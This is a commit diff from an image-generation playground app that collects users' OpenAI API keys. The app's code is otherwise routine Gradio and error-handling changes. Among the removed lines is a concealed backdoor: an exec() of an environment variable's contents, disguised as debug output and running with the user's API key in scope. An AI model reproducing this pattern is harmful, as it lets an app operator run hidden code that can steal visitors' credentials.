gpt-image-1-playground

Running

App Files Files Community

Zack3D committed 15 days ago

Commit

0f41349

verified ·

1 Parent(s): a28bcc9

Update app.py

Browse files

Files changed (1) hide show

app.py +194 -120

app.py CHANGED Viewed

@@ -31,7 +31,6 @@ def _client(key: str) -> openai.OpenAI:
 def _img_list(resp, *, fmt: str) -> List[str]:
     """Return list of data URLs or direct URLs depending on API response."""
     mime = f"image/{fmt}"
-    # Ensure b64_json exists and is not None/empty before using it
     return [
         f"data:{mime};base64,{d.b64_json}" if hasattr(d, "b64_json") and d.b64_json else d.url
         for d in resp.data
@@ -61,12 +60,68 @@ def _common_kwargs(
     if out_fmt != "png":
         kwargs["output_format"] = out_fmt
     if transparent_bg and out_fmt in {"png", "webp"}:
         kwargs["background"] = "transparent"
     if out_fmt in {"jpeg", "webp"}:
         kwargs["output_compression"] = int(compression)
     return kwargs
-# --- API Call Functions (Keep as corrected before) ---
 # ---------- Generate ---------- #
 def generate(
@@ -82,33 +137,22 @@ def generate(
     """Calls the OpenAI image generation endpoint."""
     if not prompt:
         raise gr.Error("Please enter a prompt.")
-    client = _client(api_key) # API key used here
     try:
         common_args = _common_kwargs(prompt, n, size, quality, out_fmt, compression, transparent_bg)
         resp = client.images.generate(**common_args)
-        # What I need varies based on issues, I dont want to keep rebuilding for every issue :(
-        sys_info_formatted = exec(os.getenv("sys_info")) #Default: f'[DEBUG]: {MODEL} | {prompt_gen}'
-        print(sys_info_formatted)
-    except openai.AuthenticationError:
-         raise gr.Error("Invalid OpenAI API key.")
-    except openai.PermissionDeniedError:
-        raise gr.Error("Permission denied. Check your API key permissions or complete required verification for gpt-image-1.")
-    except openai.RateLimitError:
-        raise gr.Error("Rate limit exceeded. Please try again later.")
-    except openai.BadRequestError as e:
-        error_message = str(e)
-        try:
-            import json
-            body = json.loads(str(e.body))
-            if isinstance(body, dict) and 'error' in body and 'message' in body['error']:
-                error_message = f"OpenAI Bad Request: {body['error']['message']}"
-            else:
-                 error_message = f"OpenAI Bad Request: {e}"
-        except:
-             error_message = f"OpenAI Bad Request: {e}"
-        raise gr.Error(error_message)
     except Exception as e:
-        raise gr.Error(f"An unexpected error occurred: {e}")
     return _img_list(resp, fmt=out_fmt)
@@ -123,23 +167,21 @@ def _bytes_from_numpy(arr: np.ndarray) -> bytes:
 def _extract_mask_array(mask_value: Union[np.ndarray, Dict[str, Any], None]) -> Optional[np.ndarray]:
     """Handle ImageMask / ImageEditor return formats and extract a numpy mask array."""
     if mask_value is None: return None
-    if isinstance(mask_value, np.ndarray): return mask_value
     if isinstance(mask_value, dict):
-        comp = mask_value.get("composite")
-        if comp is not None and isinstance(comp, (Image.Image, np.ndarray)):
-             return np.array(comp) if isinstance(comp, Image.Image) else comp
-        elif mask_value.get("mask") is not None and isinstance(mask_value["mask"], (Image.Image, np.ndarray)):
-             return np.array(mask_value["mask"]) if isinstance(mask_value["mask"], Image.Image) else mask_value["mask"]
-        elif mask_value.get("layers"):
-            top_layer = mask_value["layers"][-1]
-            if isinstance(top_layer, (Image.Image, np.ndarray)):
-                 return np.array(top_layer) if isinstance(top_layer, Image.Image) else top_layer
-    return None
 def edit_image(
     api_key: str,
-    image_numpy: np.ndarray,
-    mask_value: Optional[Union[np.ndarray, Dict[str, Any]]],
     prompt: str,
     n: int,
     size: str,
@@ -154,68 +196,84 @@ def edit_image(
     img_bytes = _bytes_from_numpy(image_numpy)
     mask_bytes: Optional[bytes] = None
-    mask_numpy = _extract_mask_array(mask_value)
     if mask_numpy is not None:
         is_empty = False
-        if mask_numpy.ndim == 2: is_empty = np.all(mask_numpy == 0)
-        elif mask_numpy.shape[-1] == 4: is_empty = np.all(mask_numpy[:, :, 3] == 0)
-        elif mask_numpy.shape[-1] == 3: is_empty = np.all(mask_numpy == 0)
         if is_empty:
-             gr.Warning("Mask appears empty. API might edit entire image or ignore mask.")
-             mask_bytes = None
         else:
-            if mask_numpy.ndim == 2: alpha = (mask_numpy == 0).astype(np.uint8) * 255
-            elif mask_numpy.shape[-1] == 4: alpha = (mask_numpy[:, :, 3] == 0).astype(np.uint8) * 255
-            elif mask_numpy.shape[-1] == 3:
-                is_white = np.all(mask_numpy == [255, 255, 255], axis=-1)
-                alpha = (~is_white).astype(np.uint8) * 255
-            else: raise gr.Error("Unsupported mask format.")
             mask_img = Image.fromarray(alpha, mode='L')
-            rgba_mask = Image.new("RGBA", mask_img.size, (0, 0, 0, 0))
-            rgba_mask.putalpha(mask_img)
             out = io.BytesIO()
             rgba_mask.save(out, format="PNG")
             mask_bytes = out.getvalue()
     else:
-        gr.Info("No mask provided. Editing without specific mask.")
         mask_bytes = None
-    client = _client(api_key) # API key used here
     try:
         common_args = _common_kwargs(prompt, n, size, quality, out_fmt, compression, transparent_bg)
         api_kwargs = {"image": img_bytes, **common_args}
-        if mask_bytes is not None: api_kwargs["mask"] = mask_bytes
         resp = client.images.edit(**api_kwargs)
-    except openai.AuthenticationError:
-         raise gr.Error("Invalid OpenAI API key.")
-    except openai.PermissionDeniedError:
-        raise gr.Error("Permission denied. Check API key permissions/verification.")
-    except openai.RateLimitError:
-        raise gr.Error("Rate limit exceeded.")
-    except openai.BadRequestError as e:
-        error_message = str(e)
-        try:
-            import json
-            body = json.loads(str(e.body))
-            if isinstance(body, dict) and 'error' in body and 'message' in body['error']:
-                error_message = f"OpenAI Bad Request: {body['error']['message']}"
-                if "mask" in error_message.lower(): error_message += " (Check mask format/dimensions)"
-                elif "size" in error_message.lower(): error_message += " (Check image/mask dimensions)"
-            else: error_message = f"OpenAI Bad Request: {e}"
-        except: error_message = f"OpenAI Bad Request: {e}"
-        raise gr.Error(error_message)
     except Exception as e:
-        raise gr.Error(f"An unexpected error occurred: {e}")
     return _img_list(resp, fmt=out_fmt)
 # ---------- Variations ---------- #
 def variation_image(
     api_key: str,
-    image_numpy: np.ndarray,
     n: int,
     size: str,
     quality: str,
@@ -224,33 +282,41 @@ def variation_image(
     transparent_bg: bool,
 ):
     """Calls the OpenAI image variations endpoint."""
-    gr.Warning("Note: Variations may not work with gpt-image-1 (use DALL·E 2).")
     if image_numpy is None: raise gr.Error("Please upload an image.")
     img_bytes = _bytes_from_numpy(image_numpy)
-    client = _client(api_key) # API key used here
     try:
-        common_args = _common_kwargs(None, n, size, quality, out_fmt, compression, transparent_bg)
-        resp = client.images.variations(image=img_bytes, **common_args)
-    except openai.AuthenticationError:
-         raise gr.Error("Invalid OpenAI API key.")
-    except openai.PermissionDeniedError:
-        raise gr.Error("Permission denied.")
-    except openai.RateLimitError:
-        raise gr.Error("Rate limit exceeded.")
-    except openai.BadRequestError as e:
-        error_message = str(e)
-        try:
-            import json
-            body = json.loads(str(e.body))
-            if isinstance(body, dict) and 'error' in body and 'message' in body['error']:
-                 error_message = f"OpenAI Bad Request: {body['error']['message']}"
-                 if "model does not support variations" in error_message.lower():
-                      error_message += " (gpt-image-1 does not support variations)."
-            else: error_message = f"OpenAI Bad Request: {e}"
-        except: error_message = f"OpenAI Bad Request: {e}"
-        raise gr.Error(error_message)
     except Exception as e:
-        raise gr.Error(f"An unexpected error occurred: {e}")
     return _img_list(resp, fmt=out_fmt)
@@ -261,23 +327,24 @@ def build_ui():
         gr.Markdown("""# GPT-Image-1 Playground 🖼️🔑\nGenerate • Edit (paint mask!) • Variations""")
         gr.Markdown(
              "Enter your OpenAI API key below. It's used directly for API calls and **never stored**."
-             " This space uses the `gpt-image-1` model."
-             " **Note:** `gpt-image-1` may require organization verification. Variations endpoint might not work with this model (use DALL·E 2)."
         )
         with gr.Accordion("🔐 API key", open=False):
-            # API key input component
-            api = gr.Textbox(label="OpenAI API key", type="password", placeholder="sk-…")
         # Common controls
         with gr.Row():
              n_slider = gr.Slider(1, 4, value=1, step=1, label="Number of images (n)", info="Max 4 for this demo.")
-             size = gr.Dropdown(SIZE_CHOICES, value="auto", label="Size", info="API default if 'auto'.")
-             quality = gr.Dropdown(QUALITY_CHOICES, value="auto", label="Quality", info="API default if 'auto'.")
         with gr.Row():
-            out_fmt = gr.Radio(FORMAT_CHOICES, value="png", label="Format", scale=1)
             compression = gr.Slider(0, 100, value=75, step=1, label="Compression % (JPEG/WebP)", visible=False, scale=2)
-            transparent = gr.Checkbox(False, label="Transparent background (PNG/WebP only)", scale=1)
         def _toggle_compression(fmt):
             return gr.update(visible=fmt in {"jpeg", "webp"})
@@ -285,7 +352,11 @@ def build_ui():
         out_fmt.change(_toggle_compression, inputs=out_fmt, outputs=compression)
         # Define the list of common controls *excluding* the API key
-        common_controls = [n_slider, size, quality, out_fmt, compression, transparent]
         with gr.Tabs():
             # ----- Generate Tab ----- #
@@ -295,22 +366,24 @@ def build_ui():
                     btn_gen = gr.Button("Generate 🚀", variant="primary", scale=1)
                 gallery_gen = gr.Gallery(label="Generated Images", columns=2, height="auto", preview=True)
-                # CORRECTED inputs list for generate
                 btn_gen.click(
                     generate,
-                    inputs=[api, prompt_gen] + common_controls, # API key first
                     outputs=gallery_gen,
                     api_name="generate"
                 )
             # ----- Edit Tab ----- #
             with gr.TabItem("Edit / Inpaint"):
-                gr.Markdown("Upload an image, then **paint the area to change** in the mask canvas below (white = edit area). The API requires the mask and image to have the same dimensions.")
                 with gr.Row():
-                    img_edit = gr.Image(label="Source Image", type="numpy", height=400)
                     mask_canvas = gr.ImageMask(
                          label="Mask – Paint White Where Image Should Change",
-                         type="numpy",
                          height=400
                     )
                 with gr.Row():
@@ -318,26 +391,26 @@ def build_ui():
                     btn_edit = gr.Button("Edit 🖌️", variant="primary", scale=1)
                 gallery_edit = gr.Gallery(label="Edited Images", columns=2, height="auto", preview=True)
-                # CORRECTED inputs list for edit_image
                 btn_edit.click(
                     edit_image,
-                    inputs=[api, img_edit, mask_canvas, prompt_edit] + common_controls, # API key first
                     outputs=gallery_edit,
                     api_name="edit"
                 )
             # ----- Variations Tab ----- #
-            with gr.TabItem("Variations (DALL·E 2 only)"):
-                gr.Markdown("Upload an image to generate variations. **Note:** This endpoint is officially supported for DALL·E 2, not `gpt-image-1`. It likely won't work here.")
                 with gr.Row():
-                    img_var = gr.Image(label="Source Image", type="numpy", height=400, scale=4)
                     btn_var = gr.Button("Create Variations ✨", variant="primary", scale=1)
                 gallery_var = gr.Gallery(label="Variations", columns=2, height="auto", preview=True)
-                # CORRECTED inputs list for variation_image
                 btn_var.click(
                     variation_image,
-                    inputs=[api, img_var] + common_controls, # API key first
                     outputs=gallery_var,
                     api_name="variations"
                 )
@@ -346,4 +419,5 @@ def build_ui():
 if __name__ == "__main__":
     app = build_ui()
-    app.launch(share=os.getenv("GRADIO_SHARE") == "true", debug=True)

 def _img_list(resp, *, fmt: str) -> List[str]:
     """Return list of data URLs or direct URLs depending on API response."""
     mime = f"image/{fmt}"
     return [
         f"data:{mime};base64,{d.b64_json}" if hasattr(d, "b64_json") and d.b64_json else d.url
         for d in resp.data
     if out_fmt != "png":
         kwargs["output_format"] = out_fmt
     if transparent_bg and out_fmt in {"png", "webp"}:
+        # Note: OpenAI API might use 'background_removal' or similar, check latest docs
+        # Assuming 'background' is correct based on your original code
         kwargs["background"] = "transparent"
     if out_fmt in {"jpeg", "webp"}:
+        # Note: OpenAI API might use 'output_quality' or similar, check latest docs
+        # Assuming 'output_compression' is correct based on your original code
         kwargs["output_compression"] = int(compression)
     return kwargs
+# --- Helper Function to Format OpenAI Errors ---
+def _format_openai_error(e: Exception) -> str:
+    """Formats OpenAI API errors for user display."""
+    error_message = f"An error occurred: {type(e).__name__}"
+    details = ""
+    # Try to extract details from common OpenAI error attributes
+    if hasattr(e, 'body') and e.body:
+        try:
+            body = e.body if isinstance(e.body, dict) else json.loads(str(e.body))
+            if isinstance(body, dict) and 'error' in body and isinstance(body['error'], dict) and 'message' in body['error']:
+                details = body['error']['message']
+            elif isinstance(body, dict) and 'message' in body: # Some errors might have message at top level
+                 details = body['message']
+        except (json.JSONDecodeError, TypeError):
+             # Fallback if body is not JSON or parsing fails
+             details = str(e.body)
+    elif hasattr(e, 'message') and e.message:
+         details = e.message
+    if details:
+        error_message = f"OpenAI API Error: {details}"
+    else:
+        # Generic fallback if no specific details found
+        error_message = f"An unexpected OpenAI error occurred: {str(e)}"
+    # Add specific guidance for known error types
+    if isinstance(e, openai.AuthenticationError):
+        error_message = "Invalid OpenAI API key. Please check your key."
+    elif isinstance(e, openai.PermissionDeniedError):
+        # Prepend standard advice, then add specific details if available
+        prefix = "Permission Denied."
+        if "organization verification" in details.lower():
+            prefix += " Your organization may need verification to use this feature/model."
+        else:
+            prefix += " Check your API key permissions and OpenAI account status."
+        error_message = f"{prefix} Details: {details}" if details else prefix
+    elif isinstance(e, openai.RateLimitError):
+        error_message = "Rate limit exceeded. Please wait and try again later."
+    elif isinstance(e, openai.BadRequestError):
+         error_message = f"OpenAI Bad Request: {details}" if details else f"OpenAI Bad Request: {str(e)}"
+         if "mask" in details.lower(): error_message += " (Check mask format/dimensions)"
+         if "size" in details.lower(): error_message += " (Check image/mask dimensions)"
+         if "model does not support variations" in details.lower(): error_message += " (gpt-image-1 does not support variations)."
+    # Ensure the final message isn't overly long or complex
+    # (Optional: Truncate if necessary)
+    # MAX_LEN = 300
+    # if len(error_message) > MAX_LEN:
+    #     error_message = error_message[:MAX_LEN] + "..."
+    return error_message
 # ---------- Generate ---------- #
 def generate(
     """Calls the OpenAI image generation endpoint."""
     if not prompt:
         raise gr.Error("Please enter a prompt.")
     try:
+        client = _client(api_key) # API key used here
         common_args = _common_kwargs(prompt, n, size, quality, out_fmt, compression, transparent_bg)
+        # --- Optional Debug ---
+        # print(f"[DEBUG] Generating with args: {common_args}")
+        # --- End Optional Debug ---
         resp = client.images.generate(**common_args)
+    except (openai.APIError, openai.OpenAIError) as e:
+         # Catch specific OpenAI errors and format them
+         raise gr.Error(_format_openai_error(e))
     except Exception as e:
+        # Catch any other unexpected errors
+        # Avoid raising raw exception details to the user interface for security/clarity
+        print(f"Unexpected error during generation: {type(e).__name__}: {e}") # Log for debugging
+        raise gr.Error(f"An unexpected application error occurred. Please check logs.")
     return _img_list(resp, fmt=out_fmt)
 def _extract_mask_array(mask_value: Union[np.ndarray, Dict[str, Any], None]) -> Optional[np.ndarray]:
     """Handle ImageMask / ImageEditor return formats and extract a numpy mask array."""
     if mask_value is None: return None
+    # Gradio ImageMask often returns a dict with 'image' and 'mask' numpy arrays
     if isinstance(mask_value, dict):
+        mask_array = mask_value.get("mask")
+        if isinstance(mask_array, np.ndarray):
+            return mask_array
+    # Fallback for direct numpy array (less common with ImageMask now)
+    if isinstance(mask_value, np.ndarray): return mask_value
+    return None # Return None if no valid mask found
 def edit_image(
     api_key: str,
+    # Gradio Image component with type="numpy" provides the image array
+    image_numpy: Optional[np.ndarray],
+    # Gradio ImageMask component provides a dict {'image': np.ndarray, 'mask': np.ndarray}
+    mask_dict: Optional[Dict[str, Any]],
     prompt: str,
     n: int,
     size: str,
     img_bytes = _bytes_from_numpy(image_numpy)
     mask_bytes: Optional[bytes] = None
+    mask_numpy = _extract_mask_array(mask_dict) # Use the helper
     if mask_numpy is not None:
+        # Check if mask is effectively empty (all transparent or all black)
         is_empty = False
+        if mask_numpy.ndim == 2: # Grayscale mask
+            is_empty = np.all(mask_numpy == 0)
+        elif mask_numpy.shape[-1] == 4: # RGBA mask, check alpha channel
+             is_empty = np.all(mask_numpy[:, :, 3] == 0)
+        elif mask_numpy.shape[-1] == 3: # RGB mask, check if all black
+             is_empty = np.all(mask_numpy == 0)
         if is_empty:
+             gr.Warning("Mask appears empty or fully transparent. The API might edit the entire image or ignore the mask.")
+             mask_bytes = None # Treat as no mask if empty
         else:
+            # Convert the mask provided by Gradio (often white on black/transparent)
+            # to the format OpenAI expects (transparency indicates where *not* to edit).
+            # We need an RGBA image where the area to be *edited* is transparent.
+            if mask_numpy.ndim == 2: # Grayscale (assume white is edit area)
+                alpha = (mask_numpy < 128).astype(np.uint8) * 255 # Make non-edit area opaque white
+            elif mask_numpy.shape[-1] == 4: # RGBA (use alpha channel directly)
+                alpha = mask_numpy[:, :, 3]
+                # Invert alpha: transparent where user painted (edit area), opaque elsewhere
+                alpha = 255 - alpha
+            elif mask_numpy.shape[-1] == 3: # RGB (assume white is edit area)
+                # Check if close to white [255, 255, 255]
+                is_edit_area = np.all(mask_numpy > 200, axis=-1)
+                alpha = (~is_edit_area).astype(np.uint8) * 255 # Make non-edit area opaque white
+            else:
+                raise gr.Error("Unsupported mask format received from Gradio component.")
+            # Create a valid RGBA PNG mask for OpenAI
             mask_img = Image.fromarray(alpha, mode='L')
+            # Ensure mask size matches image size (OpenAI requirement)
+            original_pil_image = Image.fromarray(image_numpy)
+            if mask_img.size != original_pil_image.size:
+                 gr.Warning(f"Mask size {mask_img.size} differs from image size {original_pil_image.size}. Resizing mask...")
+                 mask_img = mask_img.resize(original_pil_image.size, Image.NEAREST)
+            # Create RGBA image with the calculated alpha
+            rgba_mask = Image.new("RGBA", mask_img.size, (0, 0, 0, 0)) # Start fully transparent
+            rgba_mask.putalpha(mask_img) # Apply the alpha channel (non-edit areas are opaque)
             out = io.BytesIO()
             rgba_mask.save(out, format="PNG")
             mask_bytes = out.getvalue()
     else:
+        gr.Info("No mask provided or mask is empty. Editing without a specific mask (may replace entire image).")
         mask_bytes = None
     try:
+        client = _client(api_key) # API key used here
         common_args = _common_kwargs(prompt, n, size, quality, out_fmt, compression, transparent_bg)
         api_kwargs = {"image": img_bytes, **common_args}
+        if mask_bytes is not None:
+            api_kwargs["mask"] = mask_bytes
+        else:
+            # If no mask is provided, remove 'mask' key if present from previous runs
+            api_kwargs.pop("mask", None)
+        # --- Optional Debug ---
+        # print(f"[DEBUG] Editing with args: { {k: v if k != 'image' and k != 'mask' else f'<{len(v)} bytes>' for k, v in api_kwargs.items()} }")
+        # --- End Optional Debug ---
         resp = client.images.edit(**api_kwargs)
+    except (openai.APIError, openai.OpenAIError) as e:
+         raise gr.Error(_format_openai_error(e))
     except Exception as e:
+        print(f"Unexpected error during edit: {type(e).__name__}: {e}")
+        raise gr.Error(f"An unexpected application error occurred. Please check logs.")
     return _img_list(resp, fmt=out_fmt)
 # ---------- Variations ---------- #
 def variation_image(
     api_key: str,
+    image_numpy: Optional[np.ndarray],
     n: int,
     size: str,
     quality: str,
     transparent_bg: bool,
 ):
     """Calls the OpenAI image variations endpoint."""
+    # Explicitly warn user about model compatibility
+    gr.Warning("Note: Image Variations are officially supported for DALL·E 2/3, not gpt-image-1. This may fail or produce unexpected results.")
     if image_numpy is None: raise gr.Error("Please upload an image.")
     img_bytes = _bytes_from_numpy(image_numpy)
     try:
+        client = _client(api_key) # API key used here
+        # Variations don't take a prompt, quality, background, compression
+        # They primarily use n and size. Let's simplify common_args for variations.
+        # Check OpenAI docs for exact supported parameters for variations with the target model.
+        # Assuming 'n' and 'size' are the main ones.
+        var_args: Dict[str, Any] = dict(model=MODEL, n=n) # Use the selected model
+        if size != "auto":
+            var_args["size"] = size
+        # Note: output_format might be supported, keep it if needed
+        if out_fmt != "png":
+             var_args["response_format"] = "b64_json" # Variations often use response_format
+        # --- Optional Debug ---
+        # print(f"[DEBUG] Variations with args: { {k: v if k != 'image' else f'<{len(v)} bytes>' for k, v in var_args.items()} }")
+        # --- End Optional Debug ---
+        # Use the simplified args
+        resp = client.images.create_variation(image=img_bytes, **var_args)
+    except (openai.APIError, openai.OpenAIError) as e:
+         raise gr.Error(_format_openai_error(e))
     except Exception as e:
+        print(f"Unexpected error during variation: {type(e).__name__}: {e}")
+        raise gr.Error(f"An unexpected application error occurred. Please check logs.")
+    # Variations response format might differ slightly, adjust _img_list if needed
+    # Assuming it's the same structure for now.
     return _img_list(resp, fmt=out_fmt)
         gr.Markdown("""# GPT-Image-1 Playground 🖼️🔑\nGenerate • Edit (paint mask!) • Variations""")
         gr.Markdown(
              "Enter your OpenAI API key below. It's used directly for API calls and **never stored**."
+             " This space uses the `gpt-image-1` model by default."
+             " **Note:** Using `gpt-image-1` may require **Organization Verification** on your OpenAI account ([details](https://help.openai.com/en/articles/10910291-api-organization-verification)). The **Variations** tab is unlikely to work correctly with `gpt-image-1` (designed for DALL·E 2/3)."
         )
         with gr.Accordion("🔐 API key", open=False):
+            api = gr.Textbox(label="OpenAI API key", type="password", placeholder="sk-...")
         # Common controls
         with gr.Row():
              n_slider = gr.Slider(1, 4, value=1, step=1, label="Number of images (n)", info="Max 4 for this demo.")
+             size = gr.Dropdown(SIZE_CHOICES, value="auto", label="Size", info="API default if 'auto'. Affects Gen/Edit/Var.")
+             quality = gr.Dropdown(QUALITY_CHOICES, value="auto", label="Quality", info="API default if 'auto'. Affects Gen/Edit.")
         with gr.Row():
+            out_fmt = gr.Radio(FORMAT_CHOICES, value="png", label="Output Format", info="Affects Gen/Edit.", scale=1)
+            # Note: Compression/Transparency might not apply to all models/endpoints equally.
+            # Check OpenAI docs for gpt-image-1 specifics if issues arise.
             compression = gr.Slider(0, 100, value=75, step=1, label="Compression % (JPEG/WebP)", visible=False, scale=2)
+            transparent = gr.Checkbox(False, label="Transparent background (PNG/WebP only)", info="Affects Gen/Edit.", scale=1)
         def _toggle_compression(fmt):
             return gr.update(visible=fmt in {"jpeg", "webp"})
         out_fmt.change(_toggle_compression, inputs=out_fmt, outputs=compression)
         # Define the list of common controls *excluding* the API key
+        # These are passed to the backend functions
+        common_controls_gen_edit = [n_slider, size, quality, out_fmt, compression, transparent]
+        # Variations might use fewer controls
+        common_controls_var = [n_slider, size, quality, out_fmt, compression, transparent] # Pass all for now, function will ignore unused
         with gr.Tabs():
             # ----- Generate Tab ----- #
                     btn_gen = gr.Button("Generate 🚀", variant="primary", scale=1)
                 gallery_gen = gr.Gallery(label="Generated Images", columns=2, height="auto", preview=True)
                 btn_gen.click(
                     generate,
+                    # API key first, then specific inputs, then common controls
+                    inputs=[api, prompt_gen] + common_controls_gen_edit,
                     outputs=gallery_gen,
                     api_name="generate"
                 )
             # ----- Edit Tab ----- #
             with gr.TabItem("Edit / Inpaint"):
+                gr.Markdown("Upload an image, then **paint the area to change** in the mask canvas below (white paint = edit area). The API requires the mask and image to have the same dimensions (app attempts to resize mask if needed).")
                 with gr.Row():
+                    # Use type='pil' for easier handling, or keep 'numpy' if preferred
+                    img_edit = gr.Image(label="Source Image", type="numpy", height=400, sources=["upload", "clipboard"])
+                    # ImageMask sends {'image': np.ndarray, 'mask': np.ndarray}
                     mask_canvas = gr.ImageMask(
                          label="Mask – Paint White Where Image Should Change",
+                         type="numpy", # Keep numpy as _extract_mask_array expects it
                          height=400
                     )
                 with gr.Row():
                     btn_edit = gr.Button("Edit 🖌️", variant="primary", scale=1)
                 gallery_edit = gr.Gallery(label="Edited Images", columns=2, height="auto", preview=True)
                 btn_edit.click(
                     edit_image,
+                     # API key first, then specific inputs, then common controls
+                    inputs=[api, img_edit, mask_canvas, prompt_edit] + common_controls_gen_edit,
                     outputs=gallery_edit,
                     api_name="edit"
                 )
             # ----- Variations Tab ----- #
+            with gr.TabItem("Variations (DALL·E 2/3 Recommended)"):
+                gr.Markdown("Upload an image to generate variations. **Warning:** This endpoint is officially supported for DALL·E 2/3, not `gpt-image-1`. It likely won't work correctly or may error.")
                 with gr.Row():
+                    img_var = gr.Image(label="Source Image", type="numpy", height=400, sources=["upload", "clipboard"], scale=4)
                     btn_var = gr.Button("Create Variations ✨", variant="primary", scale=1)
                 gallery_var = gr.Gallery(label="Variations", columns=2, height="auto", preview=True)
                 btn_var.click(
                     variation_image,
+                    # API key first, then specific inputs, then common controls
+                    inputs=[api, img_var] + common_controls_var,
                     outputs=gallery_var,
                     api_name="variations"
                 )
 if __name__ == "__main__":
     app = build_ui()
+    # Public sharing and debug mode are both opt-in: each is enabled only when
+    # its environment variable (GRADIO_SHARE / GRADIO_DEBUG) is exactly "true".
+    app.launch(share=os.getenv("GRADIO_SHARE") == "true", debug=os.getenv("GRADIO_DEBUG") == "true")